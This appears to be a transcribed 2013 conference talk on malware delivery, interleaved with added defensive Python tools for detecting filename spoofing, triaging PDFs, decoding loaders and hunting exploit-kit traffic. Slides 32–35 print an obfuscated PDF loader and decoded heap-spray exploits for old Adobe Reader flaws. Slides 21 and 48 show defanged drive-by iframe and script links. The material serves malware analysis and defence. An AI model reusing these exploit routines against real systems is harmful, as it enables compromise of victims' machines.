Dr. Strangelove or: How I Learned to Stop Worrying and Love Malware
Matthias Schmidt - Entwicklertag 2013 (slide footer: 06/03/14)
My talk about Malware from the Entwicklertag 2013 in Karlsruhe.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
74
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
1
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Dr. Strangelove or: How I Learned to Stop Worrying and Love Malware

  1. Dr. Strangelove or: How I Learned to Stop Worrying and Love Malware. Matthias Schmidt, Entwicklertag 2013
  2. Quid est Malware?
  3. Malware: Viruses, Adware, Trojans, Worms, Ransomware, Rootkits, Spyware, Dialers, Keyloggers
  4. Malware – why bother?
  5. Personal Motivation
  6. Although evil, Malware is usually Art
  7. Business Motivation
  8. (chart) Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs
  9. (chart) Source: McAfee Threats Report, Second Quarter 2012, McAfee Labs
  10. And for anybody else, there is …
  11. MasterCard: Latest AV Software $50. Update for 2 years $75. Losing all your data: Priceless
  12. Infection – Classics
  13. Email Attachment
  14. Malicious URLs
  15. Malicious Download
  16. Infection – Next Generation[TM]
  17. Everybody loves images, right?
  18. U+202e anyone?
        $ stat EmmaWatsonS<202e>gpj.exe
          File: `EmmaWatsonSgpj.exe'
          Size: 3         Blocks: 8          IO Block: 4096   regular file
        Device: 804h/2052d      Inode: 9047185     Links: 1
        Access: (0644/-rw-r--r--)  Uid: ( 1000/m)   Gid: ( 1000/m)
        […]
      The stored name ends in ".exe"; stat simply drops the control character, but a viewer that honours the override renders everything after it right-to-left, so the name appears to end in "exe.jpg".
  19. U+202e: Unicode Character 'RIGHT-TO-LEFT OVERRIDE'. HTML entity: &#x202e; Windows: Alt + 202E; UTF-32: 0x0000202E; C/C++/Java: "\u202E"; Python: u"\u202E"
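The override trick on slides 18 and 19 can be checked for mechanically before a file is opened: find any Unicode bidi control in the stored name, compute what a naive listing would display, and compare the displayed extension with the real one. The following is an added example, not code from the talk. The displayed-name model is a deliberate simplification (assumption: a single U+202E reverses everything after it; other controls are treated as merely invisible), and the sample file name is constructed from the one on the slide.

```python
import unicodedata

# Unicode bidi controls that can reorder how a name is displayed: the explicit
# embeddings/overrides U+202A..U+202E (U+202E is the RIGHT-TO-LEFT OVERRIDE from
# the slide) and the isolates U+2066..U+2069.
BIDI_CONTROLS = frozenset(chr(cp) for cp in range(0x202A, 0x202F)) | \
                frozenset(chr(cp) for cp in range(0x2066, 0x206A))


def find_bidi_controls(name):
    """Every bidi control in name as (index, 'U+XXXX', Unicode name)."""
    return [(i, f"U+{ord(ch):04X}", unicodedata.name(ch, "UNKNOWN"))
            for i, ch in enumerate(name) if ch in BIDI_CONTROLS]


def displayed_name(name):
    """What a left-to-right file listing shows. Simplified bidi model
    (assumption): a single U+202E reverses everything after it; any other
    control is just invisible."""
    controls = find_bidi_controls(name)
    if controls and name[controls[0][0]] == "\u202e":
        i = controls[0][0]
        return name[:i] + name[i + 1:][::-1]
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def real_extension(name):
    """The extension the OS acts on: text after the last '.' of the stored
    name, with controls stripped so one cannot hide inside the extension."""
    stripped = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return stripped[stripped.rfind("."):].lower() if "." in stripped else ""


def assess(name):
    shown = displayed_name(name)
    shown_ext = shown[shown.rfind("."):].lower() if "." in shown else ""
    ext = real_extension(name)
    controls = find_bidi_controls(name)
    return {
        "stored": name,
        "controls": controls,
        "displayed": shown,
        "real_extension": ext,
        # an executable hiding behind a different visible extension
        "suspicious": bool(controls) and ext != shown_ext,
    }


# Constructed sample: the file name from the slide with the RLO in place.
SAMPLE = "EmmaWatsonS\u202egpj.exe"

if __name__ == "__main__":
    r = assess(SAMPLE)
    print("stored   :", ascii(r["stored"]))
    print("displayed:", r["displayed"])
    print("real ext :", r["real_extension"], "suspicious:", r["suspicious"])
```

Run against a mail gateway's attachment names or a download directory, the useful signal is `suspicious`: a bidi control is present and the extension the user sees differs from the one the OS will execute.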
  20. Drive by Download
  21. A zero-size iframe (URL defanged as on the slide):
        <iframe src="hxxp://tissot333.cn/eleonore/index.php" width="0" height="0" frameborder="0"></iframe>
  22. Custom exploit depending on the victim’s environment
  23. It’s no longer necessary to click!
  24. Java to the rescue. (chart) Source: Oracle JDK Security Vulnerabilities, CVE Details, 2013
  25. Did I mention Flash? (chart) Source: Adobe Flash Security Vulnerabilities, CVE Details, 2013
  26. Embedded Malware
  27. (screenshot) Source: Microsoft MSDN
  28. We learned from the macro virus decade – right?
  29. Unfortunately not. “One of the easiest and most powerful ways to customize PDF files is by using JavaScript […] JavaScript in Adobe Acrobat software implements objects, methods, and properties that enable you to manipulate PDF files, produce database-driven PDF files, modify the appearance of PDF files, and much more.” Source: https://www.adobe.com/devnet/acrobat/javascript.html
  30. What could possibly go wrong?
  31. Analysis summary of the malicious PDF (the layout is that of peepdf's file information):
        Size: 12573 bytes
        Version: 1.6
        Binary: True
        Linearized: False
        Encrypted: False
        Updates: 0
        Objects: 9
        Streams: 2
        Comments: 0
        Errors: 1

        Version 0:
          Catalog: 21
          Info: No
          Objects (9): [7, 21, 23, 24, 25, 26, 28, 60, 76]
          Streams (2): [26, 60]
          Encoded (2): [26, 60]
          Objects with JS code (1): [76]
          Suspicious elements:
            /AcroForm: [21]
            /Names: [21, 24]
            /JavaScript: [23, 25, 76]
            /JS: [25, 76]
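The summary on slide 31 is the kind of first-pass triage a practitioner wants to be able to reproduce without a full PDF parser: list the objects, note which ones carry encoded streams, and report which objects contain the names that usually mean trouble (/JavaScript, /JS, /AcroForm, /Names) as well as which object holds actual script code. The following is an added example, not the tool used for the slide or the file it analysed. It builds a constructed sample PDF in memory whose JavaScript sits in a FlateDecode-compressed stream (so a grep of the raw bytes would miss it) and scans streams after inflating them. The extra names /OpenAction, /AA, /Launch and /EmbeddedFile are added here as the usual auto-run triggers; they are not on the slide.

```python
import re
import zlib

# Names a peepdf-style triage flags. The first four are the ones on the slide;
# the rest are common auto-run and dropper triggers (added here, not on the slide).
SUSPICIOUS_NAMES = [b"/AcroForm", b"/Names", b"/JavaScript", b"/JS",
                    b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile"]

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
STREAM_START_RE = re.compile(rb"stream\r?\n")
# A direct /Length only; an indirect "/Length 6 0 R" is left to the fallback.
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")
# Heuristic for "this object holds JavaScript code" rather than a reference to it.
JS_CODE_RE = re.compile(rb"/JS\s*[(<]|\bapp\.|\butil\.|unescape\s*\(|\beval\s*\(")


def split_stream(body):
    """Return (dictionary, raw stream bytes) for an object, or (body, None)."""
    m = STREAM_START_RE.search(body)
    if not m:
        return body, None
    dictionary, start = body[:m.start()], m.end()
    length = LENGTH_RE.search(dictionary)
    if length:
        raw = body[start:start + int(length.group(1))]
    else:
        raw = body[start:body.rfind(b"endstream")].rstrip(b"\r\n")
    return dictionary, raw


def inflate(dictionary, raw):
    """Inflate a /FlateDecode stream, tolerating truncated data; streams with
    other filters are returned as-is (still searchable for plain-text names)."""
    if b"/FlateDecode" not in dictionary:
        return raw
    try:
        return zlib.decompress(raw)
    except zlib.error:
        try:
            return zlib.decompressobj().decompress(raw)
        except zlib.error:
            return raw


def triage(pdf):
    """Summarise a PDF the way the slide's tool output does: object list,
    which objects carry (encoded) streams, which contain JS code, and which
    suspicious names appear in which objects (streams are searched decoded)."""
    rep = {"objects": [], "streams": [], "encoded": [], "js_objects": [], "suspicious": {}}
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(3)
        rep["objects"].append(num)
        dictionary, raw = split_stream(body)
        searchable = body
        if raw is not None:
            rep["streams"].append(num)
            if b"/Filter" in dictionary:
                rep["encoded"].append(num)
            searchable = dictionary + b"\n" + inflate(dictionary, raw)
        for name in SUSPICIOUS_NAMES:
            if re.search(re.escape(name) + rb"(?![A-Za-z])", searchable):
                rep["suspicious"].setdefault(name.decode(), []).append(num)
        if JS_CODE_RE.search(searchable):
            rep["js_objects"].append(num)
    return rep


def build_sample_pdf():
    """Constructed sample (not the file from the slide): the catalog's
    /OpenAction points at a JavaScript action whose code sits in a
    FlateDecode-compressed stream."""
    js = b'app.alert("constructed sample"); var sled = unescape("%u9090%u9090");'
    packed = zlib.compress(js)
    objs = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AcroForm << /Fields [] >> >>\nendobj",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj",
        b"4 0 obj\n<< /S /JavaScript /JS 5 0 R >>\nendobj",
        b"5 0 obj\n<< /Length " + str(len(packed)).encode() + b" /Filter /FlateDecode >>\nstream\n"
        + packed + b"\nendstream\nendobj",
    ]
    return b"%PDF-1.6\n" + b"\n".join(objs) + b"\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    report = triage(build_sample_pdf())
    for key in ("objects", "streams", "encoded", "js_objects"):
        print(f"{key} ({len(report[key])}): {report[key]}")
    print("Suspicious elements:")
    for name, objs in report["suspicious"].items():
        print(f"  {name}: {objs}")
```

On the sample, object 4 is the JavaScript action (it carries the /JS name but only a reference) and object 5 is the one with code; that is the same distinction the slide's output draws between "/JS: [25, 76]" and "Objects with JS code (1): [76]". Object streams, cross-reference streams and incremental updates are outside what this scanner handles; for real samples use a proper parser.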
  32. Object 76, the loader (the 'arr' line is elided on the slide; the alphabet is joined across the slide's line wrap):
        x='e';
        arr='13@62@[...]@73';    // Very looong line: '@'-separated indices into the alphabet below
        cc={q:'EVt;S.&<kgUAvi2pm*"IW5rxya7Gw6n/Q9lqM%{DPN[@d>-|e43K]"h,zu+j18fo :(b)cs_=}C0'}.q;
        q=x+'v'+'al';                            // "eval", assembled so the word never appears literally
        a=(Date+String).substr(2,3);             // "nct" on a real engine ("function Date() ...")
        aa=([].unshift+[].reverse).substr(2,3);  // same check on two array natives
        if (aa==a){                              // anti-emulation gate: natives must stringify as expected
          t='3vtwe';
          e=t['substr'];                         // unbound String.prototype.substr; the decoded script reuses e
          w=e(12)[q];                            // property lookup by the name in q: w ends up as eval
          s=[];
          ar=arr.split('@');
          n=cc;
          for(i=0;i<ar.length;i++){ s[i]=n[ar[i]]; }   // rebuild the real script one character at a time
          if(a===aa)w(s.join(''));               // and run it
        }
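The loader on slide 32 is a plain index-to-alphabet substitution followed by eval, so the decoded script on slide 33 can be recovered statically, without Acrobat and without running anything. The following is an added example, not code from the talk. It uses the alphabet string from the slide (assumption: the two halves of the 'cc' line are joined without a space; the visible start of the real index list, 13@62, then decodes to "if" and the final 73 to "}", which matches the first and last characters of the decoded script on slide 33). Because the slide elides the real index list, the sample loader below is constructed with a short, harmless payload.

```python
import re

# The 'cc' alphabet from object 76 on the slide, joined across the slide's
# line wrap (assumption). Each '@'-separated index in 'arr' selects one
# character; the loop s[i] = cc[ar[i]] rebuilds the real script for eval.
ALPHABET = 'EVt;S.&<kgUAvi2pm*"IW5rxya7Gw6n/Q9lqM%{DPN[@d>-|e43K]"h,zu+j18fo :(b)cs_=}C0'

ARR_RE = re.compile(r"arr='([0-9@]+)'")
CC_RE = re.compile(r"cc=\{q:'([^']*)'\}\.q")


def decode(arr, alphabet=ALPHABET):
    """Static equivalent of the loader's loop: no eval, no Acrobat needed."""
    return "".join(alphabet[int(tok)] for tok in arr.split("@"))


def encode(text, alphabet=ALPHABET):
    """Inverse of decode; used only to build the constructed sample below."""
    return "@".join(str(alphabet.index(ch)) for ch in text)


def decode_loader(script):
    """Pull 'arr' and the 'cc' alphabet out of an object-76-style loader and
    return the script it would have handed to eval."""
    arr = ARR_RE.search(script)
    cc = CC_RE.search(script)
    if not arr or not cc:
        raise ValueError("not an object-76-style loader")
    return decode(arr.group(1), cc.group(1))


def engine_gate(date_plus_string, unshift_plus_reverse):
    """The loader only evals when (Date+String).substr(2,3) equals
    ([].unshift+[].reverse).substr(2,3). On a real engine both strings start
    with 'function ...', so both give 'nct'; an emulator that stringifies
    native functions differently never reaches the eval."""
    return date_plus_string[2:5] == unshift_plus_reverse[2:5]


# Constructed loader: the real alphabet, but a short harmless payload in place
# of the slide's elided '13@62@[...]@73'.
SAMPLE_LOADER = ("x='e';arr='" + encode('app.alert("x")') + "';"
                 "cc={q:'" + ALPHABET + "'}.q;q=x+'v'+'al';")

if __name__ == "__main__":
    print(decode("13@62@73"))          # visible start and end of the real index list
    print(decode_loader(SAMPLE_LOADER))
```

When the full 'arr' line is available (from the decoded /JS stream, see the triage step), feeding the whole object 76 text to `decode_loader` yields the script shown on slide 33 directly; the engine check is the reason a dumb sandbox that stubs out `Date` or `String` with non-native functions sees nothing happen.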
  33. → decoded: the script that the object 76 loader evals (the shellcode string bjsg is elided on the slide)
        // e is the substr alias set up by the loader; e("1") returns a non-empty string, so the shellcode is assigned
        if(e("1"))bjsg="%u8366%[…]%u0000";
        // Doubles a string until it holds qy bytes, then cuts it to qy/2 UTF-16 units: sled padding for the sprays
        function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;}
        // Heap spray up to 0x0c0c0c0c, then an oversized msg argument to Collab.collectEmailInfo()
        function bx(){
          var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;
          var payload=unescape(bjsg);var sc_len=payload.length*2;
          var qy=addr-(sc_len+0x38);
          var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);
          var count2=(vw-0x400000)/addr;
          for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;}
          var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
          this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
        }
        // Heap spray with 0x0A0A-padded blocks, then util.printf("%45000f", ...) (CVE-2008-2992, see slide 35)
        function printf(){
          nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;
          bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;
          while(bigblock.length<spray){bigblock+=bigblock;}
          fillblock=bigblock.substring(0,spray);
          block=bigblock.substring(0,bigblock.length-spray);
          while(block.length+spray<0x40000){block=block+block+fillblock;}
          mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;}
          var num=1299999999999999999988[…]88;
          util.printf("%45000f",num);
        }
        // Heap spray up to 0x0c0c0c0c, then a 0x4000-character tab string prefixed "N." to Collab.getIcon() (CVE-2009-0927, see slide 35)
        function geticon(){
          var arry=new Array();
          if(app.doc.Collab.getIcon){
            var payload=unescape(bjsg);var hWq500CN=payload.length*2;
            var qy=0x400000-(hWq500CN+0x38);
            var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);
            var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;
            for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;}
            var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
            tUMhNbGw="N."+tUMhNbGw;
            app.doc.Collab.getIcon(tUMhNbGw);
          }
        }
        // Dispatch on the viewer major version (sv) and the EScript plug-in version (lv): one exploit per Reader generation
        aPlugins=app.plugIns;
        var sv=parseInt(app.viewerVersion.toString().charAt(0));
        for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
        if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}
        else if(lv==7.1){printf();}
        else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}
        // This condition is true for every numeric lv (any value is >= 9.1 or <= 9.2); the real narrowing is the (i>8.12)&&(i<8.2) check inside
        else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){
          // util.printd() calls bracket the media.newPlayer(null) call; the 0x8000-byte blocks are sprayed first
          function a(){util.printd("p@111111111111111111111111 : yyyy111",new Date());}
          var h=app.plugIns;
          for(var f=0;f<h.length;f++){if(h[f].name=="EScript"){var i=h[f].version;}}
          if((i>8.12)&&(i<8.2)){
            c=new Array();var d=unescape("%u9090%u9090");var e=unescape(bjsg);
            while(d.length<=0x8000){d+=d;}
            d=d.substr(0,0x8000-e.length);
            for(f=0;f<2900;f++){c[f]=d+e;}
            a();a();
            try{this.media.newPlayer(null);}catch(e){}
            a();
          }
        }
  34. → the version dispatch, pretty-printed:
        […]
        aPlugins = app.plugIns;
        var sv = parseInt(app.viewerVersion.toString().charAt(0));
        for (var i = 0; i < aPlugins.length; i++) {
            if (aPlugins[i].name == "EScript") {
                var lv = aPlugins[i].version;
            }
        }
        […]
        if ((lv == 9) || ((sv == 8) && (lv <= 8.12))) {
            geticon();
        } else if (lv == 7.1) {
            printf();
        } else if (((sv == 6) || (sv == 7)) && (lv < 7.11)) {
            bx();
        } else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)) {
        […]
  35. → two of the exploit routines, pretty-printed:
        function printf() {
            nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
            var payload = unescape(bjsg);
            heapblock = nop + payload;
            bigblock = unescape("%u0A0A%u0A0A");
            headersize = 20;
            spray = headersize + heapblock.length;
            while (bigblock.length < spray) {
                bigblock += bigblock;
            }
            […]
            util.printf("%45000f", num);
        }
        function geticon() {
            var arry = new Array();
            if (app.doc.Collab.getIcon) {
                var payload = unescape(bjsg);
                var yarsp = unescape("%u9090%u9090");
                yarsp = ezvr(yarsp, qy);
                var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
                […]
                for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++)
                    arry[vqcQD96y] = yarsp + payload;
                […]
                app.doc.Collab.getIcon(tUMhNbGw);
            }
        }
      CVE-2008-2992: Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability
      CVE-2009-0927: Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability
  36. Automagical[TM] Delivery
  37. Linux/Cdorked.A
  38. Random redirect – once per day per IP address
  39. Features an IP address blacklist and reacts according to the victim’s browser language
  40. Exploit Kits: Nice Pack, Cool EK, Blackhole, Red Dot, Sweet Orange, Whitehole, Neutrino
  41. Lego bricks for evil people. Features:
      • Graphical User Interface
      • Bot management
      • Fully encrypted communication
      • Latest exploit updates
      • Infos about installed AV software
      • …
  42. Black Hole – Celebrity of the Exploit Kits
  43. Responsible for most web threats in 2012. First appeared on Russian underground forums. Up-to-date licensing policy:
      Licenses:
      • Annual license: $1500
      • Half-year license: $1000
      • 3-month license: $700
      During the term of the license all the updates are free.
      Rent on our server:
      • 1 week (7 full days): $200
      • 2 weeks (14 full days): $300
      • 3 weeks (21 full days): $400
      • 4 weeks (31 full days): $500
      Source: Inside a Black Hole, Gabor Szappanos, Principal Researcher, SophosLabs
  44. Blackhole – Infection
  45. Victim receives a URL
  46. Victim receives a URL – and clicks on it
  47. URL is redirected through intermediate sites
  48. The intermediate hops as script includes (URLs defanged as on the slide):
        <script language="JavaScript" type="text/JavaScript" src="hxxp://www.grapevalleytours.com.au/ajaxam.js"></script>
        <script language="JavaScript" type="text/JavaScript" src="hxxp://www.womenetcetera.com/ajaxam.js"></script>
        <script language="JavaScript" type="text/JavaScript" src="hxxp://levillagesaintpaul.com/ccounter.js"></script>
        <script language="JavaScript" type="text/JavaScript" src="hxxp://fasttrialpayments.com/kquery.js"></script>
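Both the zero-size iframe on slide 21 and the chain of third-party script includes on slide 48 can be picked out of a fetched page mechanically. The following is an added example, not code from the talk: a small scanner built on the standard-library HTML parser that flags iframes sized or styled to be invisible and script tags whose source lives on a host other than the page's own. The sample page is constructed (assumed host www.example.com) and embeds the slide's defanged URLs; the scanner treats hxxp:// like http:// so those can be used as-is.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


def refang(url):
    """The slides write URLs as hxxp:// so they are not clickable; parse them as http."""
    return url.replace("hxxp://", "http://", 1).replace("hxxps://", "https://", 1)


class InjectionScanner(HTMLParser):
    """Flags the two patterns from the slides: an iframe sized to be invisible
    (slide 21) and <script src> includes pulled from third-party hosts (slide 48)."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    @staticmethod
    def _tiny(value):
        # width/height of 0 or 1 (with or without "px") is the classic hide
        if value is None:
            return False
        v = value.strip().lower()
        v = v[:-2].strip() if v.endswith("px") else v
        return v in ("0", "1")

    @staticmethod
    def _css_hidden(style):
        s = (style or "").replace(" ", "").lower()
        return "display:none" in s or "visibility:hidden" in s

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag == "iframe":
            if self._tiny(a.get("width")) or self._tiny(a.get("height")) or self._css_hidden(a.get("style")):
                self.findings.append(("hidden-iframe", a.get("src") or ""))
        elif tag == "script" and a.get("src"):
            host = urlparse(refang(a["src"])).hostname
            if host and host.lower() != self.page_host:
                self.findings.append(("offsite-script", a["src"]))


def scan_html(html, page_host):
    """Return [(kind, url)] for every hidden iframe and off-site script in html."""
    p = InjectionScanner(page_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample page (assumed host www.example.com) carrying the iframe
# from slide 21 and the four script includes from slide 48, plus two benign
# tags that must not be flagged.
SAMPLE_HTML = """<html><body>
<script src="/js/app.js"></script>
<iframe src="http://www.example.com/embed" width="600" height="400"></iframe>
<iframe src="hxxp://tissot333.cn/eleonore/index.php" width="0" height="0" frameborder="0"></iframe>
<script language="JavaScript" type="text/JavaScript" src="hxxp://www.grapevalleytours.com.au/ajaxam.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://www.womenetcetera.com/ajaxam.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://levillagesaintpaul.com/ccounter.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://fasttrialpayments.com/kquery.js"></script>
</body></html>"""

if __name__ == "__main__":
    for kind, url in scan_html(SAMPLE_HTML, "www.example.com"):
        print(f"{kind:15} {url}")
```

An off-site script is not proof of compromise (CDNs and analytics look the same), so in practice the list is diffed against the site's known includes; a new host appearing in that diff, or any zero-size iframe, is what warrants a look.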
  49. Blackhole server at the end of the chain
  50. Format: http://{server}/{mainfile}?{threadid}={random hex digits}
      Example: hxxp://matocrossing.com/main.php?page=206133a43dda613f
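The landing-page format on slide 50 is specific enough to hunt for in proxy logs, and the Referer header lets the redirect chain from slide 47 be reconstructed backwards from the hit. The following is an added example, not code from the talk. The log format is constructed (timestamp, client IP, URL, referer or "-"), the URLs are the slide's defanged ones plus constructed benign hosts, and the pattern accepts 16 or more hex digits (the slide's example has exactly 16; accepting more is an assumption made here).

```python
import re

# Blackhole landing-page URL format from the slide:
#   http://{server}/{mainfile}?{threadid}={random hex digits}
# The slide's example carries 16 hex digits; this pattern accepts 16 or more
# (an assumption made here, not stated on the slide).
LANDING_RE = re.compile(
    r"^https?://(?P<server>[^/?#]+)/(?P<mainfile>[^/?#]+\.php)"
    r"\?(?P<threadid>[A-Za-z_]+)=(?P<hexval>[0-9a-fA-F]{16,})$"
)


def refang(url):
    """The slides defang URLs as hxxp://; real proxy logs carry http://."""
    return url.replace("hxxp://", "http://", 1)


def parse_line(line):
    """Constructed log format: '<timestamp> <client-ip> <url> <referer-or-->'."""
    ts, client, url, referer = line.split()
    return {"ts": ts, "client": client, "url": refang(url), "referer": refang(referer)}


def redirect_chain(events, client, landing_url):
    """Walk Referer headers backwards from the landing page to recover the
    intermediate sites the victim was bounced through (slides 47 to 49)."""
    by_url = {e["url"]: e for e in events if e["client"] == client}
    chain, seen = [landing_url], {landing_url}
    ref = by_url[landing_url]["referer"]
    while ref != "-" and ref not in seen:
        chain.append(ref)
        seen.add(ref)
        if ref not in by_url:       # first hop not in the log (e.g. a link from mail)
            break
        ref = by_url[ref]["referer"]
    return list(reversed(chain))


def hunt(log_lines):
    """Return one hit per landing-page request, with the chain that led to it."""
    events = [parse_line(l) for l in log_lines if l.strip()]
    hits = []
    for e in events:
        m = LANDING_RE.match(e["url"])
        if m:
            hits.append({
                "client": e["client"],
                "server": m["server"],
                "mainfile": m["mainfile"],
                "threadid": m["threadid"],
                "chain": redirect_chain(events, e["client"], e["url"]),
            })
    return hits


# Constructed proxy log: one victim goes news site -> injected script ->
# redirector -> Blackhole landing page (URL from slide 50); a second client
# hits a benign main.php whose parameter is not a hex thread id.
SAMPLE_LOG = """
2013-03-06T10:00:01 10.0.0.5 http://news.example.org/article.html -
2013-03-06T10:00:02 10.0.0.5 hxxp://www.grapevalleytours.com.au/ajaxam.js http://news.example.org/article.html
2013-03-06T10:00:03 10.0.0.5 http://redirector.example.net/go.php?x=1 http://news.example.org/article.html
2013-03-06T10:00:04 10.0.0.5 hxxp://matocrossing.com/main.php?page=206133a43dda613f http://redirector.example.net/go.php?x=1
2013-03-06T10:00:05 10.0.0.7 http://shop.example.com/main.php?page=checkout -
""".strip().splitlines()

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['server']} ({hit['threadid']}=...)")
        print("  chain: " + " -> ".join(hit["chain"]))
```

The hex-parameter pattern on its own will produce false positives on legitimate PHP sites that pass session tokens in the query string, which is why the output carries the chain: a landing page reached through a freshly injected third-party script is a much stronger signal than the URL shape alone.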
  51. Server delivers custom exploit code
  52. (image only)
  53. Recommendations: Train/gain more awareness. Remove/disable browser plugins. Don’t forget the worst case.
  54. Thank you!
  55. Q&A. Matthias Schmidt, @_xhr_